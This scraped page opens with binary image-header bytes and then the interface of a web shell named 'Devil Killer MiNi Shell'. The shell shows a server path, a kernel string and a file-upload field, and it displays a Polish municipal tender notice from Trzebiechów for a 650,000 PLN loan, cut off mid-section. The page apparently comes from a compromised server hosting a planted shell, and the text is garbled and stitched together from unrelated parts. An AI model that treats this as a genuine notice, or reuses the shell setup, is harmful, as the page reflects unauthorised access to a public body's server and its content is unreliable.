JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241104/0057769001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie i obsługa kredytu długoterminowego w wysokości 650 000,00 PLN </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Trzebiechów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770741</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sulechowska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzebiechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-132</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@trzebiechow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.trzebiechow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie i obsługa kredytu długoterminowego w wysokości 650 000,00 PLN </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-af850121-5c2e-442a-bb7e-fc44fed1e88b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00577690</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00062384/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Udzielenie kredytu długoterminowego o wartości 650000,00 zł</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/trzebiechow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/trzebiechow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający będzie przekazywał<br/>wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za<br/>pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej „RODO”) (Dz.<br/>U. UE. L. 119.1 z 04.05.2016) informuję, iż:<br/>1) Administratorem danych osobowych jest Wójt Gminy Trzebiechów. Z administratorem można się<br/>skontaktować poprzez adres email: sekretariat@trzebiechow.pl lub pisemnie na adres siedziby<br/>administratora;<br/>2) Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan skontaktować poprzez email<br/>iodo@trzebiechow.pl. Z inspektorem ochrony danych można się kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw<br/>związanych z przetwarzaniem danych;<br/>3) zgodnie z treścią art. 6 ust. 1 lit. c RODO Pani/Pana dane osobowe przetwarzane będą w celu<br/>realizacji procesu wyboru wykonawcy na podstawie prowadzonego postępowania o udzielenie<br/>zamówienia publicznego, a następnie realizacji postanowień umownych związanych z wykonywanym<br/>zamówieniem;<br/>4) w związku z przetwarzaniem Pani/Pana danych w celach wskazanych powyżej, dane osobowe<br/>mogą być udostępniane innym odbiorcom lub kategoriom odbiorców danych osobowych, na podstawie<br/>przepisów prawa oraz zawartych umów powierzenia przetwarzania danych, jeżeli wymagane byłoby to<br/>w celu realizacji postanowień umownych,<br/>5) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>6) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy – Prawo zamówień<br/>publicznych przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>7) posiada Pani/Pan prawo do:<br/>a) dostępu do danych osobowych, na podstawie art. 15 RODO, przy czym administrator może żądać<br/>od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;<br/>b) sprostowania lub uzupełnienia danych osobowych, na podstawie art. 16 RODO, przy czym<br/>skorzystanie z niniejszego uprawnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą – Prawo<br/>zamówień publicznych;<br/>c) ograniczenia przetwarzania danych osobowych, na podstawie art. 18 RODO, przy czym wystąpienie<br/>z żądaniem nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego;<br/>d) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu prawo do:<br/>a) usunięcia lub przenoszenia danych osobowych,<br/>b) wniesienia sprzeciwu wobec przetwarzania danych osobowych;<br/>9) podanie danych osobowych jest konieczne w celu realizacji postępowania o udzielenie zamówienia publicznego oraz realizacji<br/>postanowień umownych. Niepodanie danych będzie skutkowało brakiem możliwości rozpatrzenia oferty złożonej w postępowaniu<br/>oraz zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z działem II. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GG.271.13.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa udzielenie kredytu długoterminowego w wysokości<br/>650 000,00 zł z przeznaczeniem na pokrycie planowanego deficytu budżetu gminy i spłatę<br/>wcześniejszych zobowiązań.<br/>2. Postawienie kredytu do dyspozycji Zamawiającego na wydzielonym rachunku kredytowym<br/>po zawarcia umowy na wskazany rachunek na podstawie polecenia przelewu.<br/>3. Planowany termin uruchomienia kredytu – listopad 2024 roku.<br/>4. Okres spłaty kredytu do 31 grudnia 2038 roku.<br/>5. Spłata kapitału i odsetek w miesięcznych ratach w złotych polskich.<br/>6. Zamawiający ma prawo dokonać wcześniejszej spłaty kredytu w całości lub jego części po<br/>uprzednim powiadomieniu Kredytodawcy i bez ponoszenia jakichkolwiek obciążeń z tego tytułu. W przypadku wcześniejszej, częściowej spłaty kredytu, okres kredytowania pozostaje bez zmian, lub może ulec skróceniu na pisemny wniosek Zamawiającego.<br/>7. Zamawiający dopuszcza pobranie z tytułu wykonania zamówienia prowizji od przyznania kredytu przy płatności I raty odsetek tj. z końcem grudnia 2024 r. Kredyt nie może być obciążony innymi opłatami i prowizjami.<br/>8. Zabezpieczeniem kredytu jest weksel własny in blanco wraz z deklaracją wekslową – podpisany przez Wójta Gminy wraz z kontrasygnatą Skarbnika.<br/>9. Informacje dodatkowe<br/>a) Zamawiający oświadcza, że nie zalega z uiszczeniem podatków oraz składek na ubezpieczenie<br/>społeczne i zdrowotne,<br/>b) Zamawiający oświadcza, że nie posiada wierzytelności, które byłyby zabezpieczone przez<br/>wierzycieli w formie przewidzianej przepisami prawa, a w szczególności hipoteką lub<br/>zastawem,<br/>c) Zamawiający oświadcza, ze na rachunkach bankowych Zamawiającego nie ciążą żadne zajęcia<br/>egzekucyjne,<br/>d) Zamawiający informuje, że nie posiada zaległych zobowiązań finansowych w bankach i innych<br/>instytucjach finansowych,<br/>e) Zamawiający informuje, że nie posiada zobowiązań wieloletnich z tytułu wsparcia udzielonych<br/>innym podmiotom, w tym zależnych od Gminy, realizującym zadania z zakresu zadań własnych<br/>Gminy lub umów powierzenia, rekompensat zawartych z tymi podmiotami,<br/>f) Zamawiający informuje, że nie posiada zobowiązań wieloletnich z tytułu planu wniesienia<br/>dopłat do kapitału ( funduszu) zakładowego innych podmiotów, w tym zależnych od Gminy, a<br/>także nie posiada oświadczeń i zobowiązań do wniesienia takich dopłat,<br/>g) Zamawiający informuje, że nie posiada zobowiązań wieloletnich z tytułu umów o partnerstwie<br/>publiczno-prawnym,<br/>h) Zamawiający informuje, że zobowiązania z tytułu kredytów i pożyczek nie są objęte<br/>restrukturyzacją i w ostatnim roku nie występowało przeterminowanie w ich spłacie.<br/>10. Zamawiający nie określa w opisie przedmiotu zamówienia żadnych wymagań dotyczących<br/>zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób<br/>wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia w<br/>sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r.- Kodeks pracy (t.j. Dz. U. z 2022 r. poz. 1510 z późn. zm.), gdyż przedmiotem zamówienia są usługi finansowe polegające na<br/>przekazaniu środków pieniężnych.<br/>11. Zamawiający nie dopuszcza składania ofert wariantowych i/lub częściowych.<br/>12. Powody niedokonania podziału zamówienia na części:<br/>a) Wartość zamówienia jest niższa od tzw. progów unijnych które zobowiązują do implementacji<br/>dyrektyw UE. Dyrektywa 2014/24/UE w treści motywu 78 wskazuje, że aby zwiększyć<br/>konkurencję, instytucje zamawiające należy w szczególności zachęcać do dzielenia dużych<br/>zamówień na części. Przedmiotowe zamówienie nie jest dużym zamówieniem w rozumieniu<br/>motywu 78 powołanej dyrektywy UE (dyrektywy stosuje się od tzw. progów UE, a dyrektywa<br/>posługuje się pojęciem dużego zamówienia na gruncie zamówień podlegających dyrektywie - a<br/>więc zamówienia o wartości znacznie przewyższającej tzw. progi UE ).<br/>b) Zamawiający nie dokonuje podziału zamówienia na części. Tym samym Zamawiający nie<br/>dopuszcza składania ofert częściowych.<br/>c) Celem wprowadzenia obowiązku podziału zamówień na części jest zwiększenie udziału sektora<br/>małych i średnich przedsiębiorstw (MŚP) w rynku zamówień publicznych. Brak podziału<br/>zamówienia na części nie skutkuje brakiem możliwości złożenia oferty w niniejszym postępowaniu<br/>przez małych i średnich przedsiębiorców. Całość niniejszego zamówienia jest dostosowana do<br/>potrzeb małych i średnich przedsiębiorstw - podział na części nie służył temu, by wielkość<br/>poszczególnych zamówień lepiej odpowiadała możliwościom tego rodzaju przedsiębiorców.<br/>d) Brak konieczności dzielenia niniejszego zamówienia na części jest z przyczyn wyżej<br/>wymienionych uzasadniony.<br/>13. Zamawiający nie dopuszcza składania ofert wariantowych.<br/>14. Zamawiający nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy Pzp.<br/>15. Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp.<br/>16. Zamawiający nie wymaga przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia<br/>przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust.<br/>2 ustawy Pzp.<br/>17. Zamawiający nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach<br/>obcych.<br/>18. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>19. Zamawiający nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych<br/>zadań zgodnie z art. 60 i art. 121 ustawy Pzp.<br/>20. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>21. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji<br/>elektronicznej wraz z informacjami, o których mowa w art. 230 ustawy Pzp.<br/>22. Zamawiający nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów<br/>elektronicznych lub dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art.<br/>93 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">168 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z działem XX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas oczekiwania (liczony w dniach roboczych) na wpływ środków na rachunek bankowy Zamawiającego, od momentu złożenia dyspozycji uruchomienia kredytu przez zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą obiegać się wykonawcy, którzy nie podlegając wykluczeniu oraz spełniają warunki udziału w<br/>posterowaniu dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca w tym zakresie powinien posiadać zezwolenie na prowadzenie działalności bankowej, zgodnie z ustawą z dnia<br/>29 sierpnia 1997 roku Prawo bankowe (Dz. U. z 2022 r. poz. 2324 z późn. zm.), a w przypadku określonym w art. 178 ust. 1<br/>tej ustawy inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia ustawy w życie, o której mowa w art.<br/>193 ustawy Prawo bankowe. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Zezwolenie Komisji Nadzoru Finansowego na prowadzenie działalności bankowej, o którym mowa w art. 36 Prawa bankowego, a w<br/>przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe inny dokument potwierdzający rozpoczęcie działalności przed dniem<br/>wejścia w życie<br/>ustawy Prawo bankowe. Uwaga: Jeśli składana oferta dotyczy wykonawców wspólnie ubiegających się o udzielenia zamówienia,<br/>wymagany dokument winien zostać złożony przez co najmniej jednego wykonawcę.<br/>2. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – załącznik nr 4 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy załączyć:<br/>1) Formularz ofertowy wraz z oświadczeniami o spełnianiu warunków udział w postępowaniu oraz braku podstaw do wykluczenia o treści zgodnej z Załącznikiem nr 2 do SWZ.<br/>2) Pełnomocnictwo (jeśli wymagane)<br/>3) Zobowiązanie podmiotu trzeciego (jeśli występuje)<br/>4) Oświadczenie na podstawie art. 117 ust. 4 PZP w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wymagań określonych w Rozdziale VIII (jeśli zamawiający stawia wymagania w Rozdziale VIII) SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany 